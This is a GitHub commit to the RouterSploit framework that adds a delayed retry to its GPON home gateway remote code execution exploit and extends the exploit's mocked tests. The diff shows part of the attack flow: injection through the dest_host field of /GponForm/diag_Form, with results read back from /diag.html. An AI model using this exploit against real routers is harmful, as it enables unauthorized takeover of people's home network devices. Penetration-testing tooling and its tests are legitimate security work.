Adding delay for retrieving results (#427)

ba4f7345 · Marcin Bury · GitHub · 32f78f8f · ba4f7345 · ba4f7345
Unverified Commit ba4f7345 authored May 19, 2018 by Marcin Bury Committed by GitHub May 19, 2018
Showing with 49 additions and 6 deletions

gpon_home_gateway_rce.py ...t/modules/exploits/routers/multi/gpon_home_gateway_rce.py +9 -0

test_gpon_home_gateway_rce.py tests/exploits/routers/multi/test_gpon_home_gateway_rce.py +40 -6

No files found.
--- a/routersploit/modules/exploits/routers/multi/gpon_home_gateway_rce.py
+++ b/routersploit/modules/exploits/routers/multi/gpon_home_gateway_rce.py
 import re
+from time import sleep
 from routersploit.core.exploit import *
 from routersploit.core.http.http_client import HTTPClient 

@@ -45,6 +46,14 @@ class Exploit(HTTPClient):
            data=data
        )

+        response = self.retrieve_response()
+        if not response:
+            sleep(3)
+            response = self.retrieve_response()
+
+        return response
+
+    def retrieve_response(self):
        response = self.http_request(
            method="GET",
            path="/diag.html?images/"

--- a/tests/exploits/routers/multi/test_gpon_home_gateway_rce.py
+++ b/tests/exploits/routers/multi/test_gpon_home_gateway_rce.py
+import time
 from unittest import mock
 from flask import request
 from routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce import Exploit


 mark = ""
+first_req = 0
+
 def apply_response1(*args, **kwargs):
-    global mark
+    global mark, first_req
+
+    first_req = time.time()
    mark = request.form["dest_host"]
    return "Test", 200


-def apply_response2(*args, **kwargs):
-    global mark
+def apply_response_without_waiting(*args, **kwargs):
+    global mark, first_req
+
    response = "diag_result = \"{}\\nNo traceroute test.".format(mark)
-    print(response)
    return response, 200


+def apply_response_with_waiting(*args, **kwargs):
+    global mark, first_req
+
+    response = "diag_result = \"{}\\nNo traceroute test.".format(mark)
+
+    if time.time() - first_req > 3:
+        return response, 200
+    else:
+        return "diag_result = \"\\nNo traceroute test.", 200
+
+
+@mock.patch("routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce.shell")
+def test_check_success(mocked_shell, target):
+    """ Test scenario - successful check without waiting """
+
+    route_mock1 = target.get_route_mock("/GponForm/diag_Form", methods=["POST"])
+    route_mock1.side_effect = apply_response1
+
+    route_mock2 = target.get_route_mock("/diag.html", methods=["GET"])
+    route_mock2.side_effect = apply_response_without_waiting
+
+    exploit = Exploit()
+    exploit.target = target.host
+    exploit.port = target.port
+
+    assert exploit.check()
+    assert exploit.run() is None
+
+
 @mock.patch("routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce.shell")
 def test_check_success(mocked_shell, target):
-    """ Test scenario - successful check """
+    """ Test scenario - successful check with waiting """

    route_mock1 = target.get_route_mock("/GponForm/diag_Form", methods=["POST"])
    route_mock1.side_effect = apply_response1

    route_mock2 = target.get_route_mock("/diag.html", methods=["GET"])
-    route_mock2.side_effect = apply_response2
+    route_mock2.side_effect = apply_response_with_waiting

    exploit = Exploit()
    exploit.target = target.host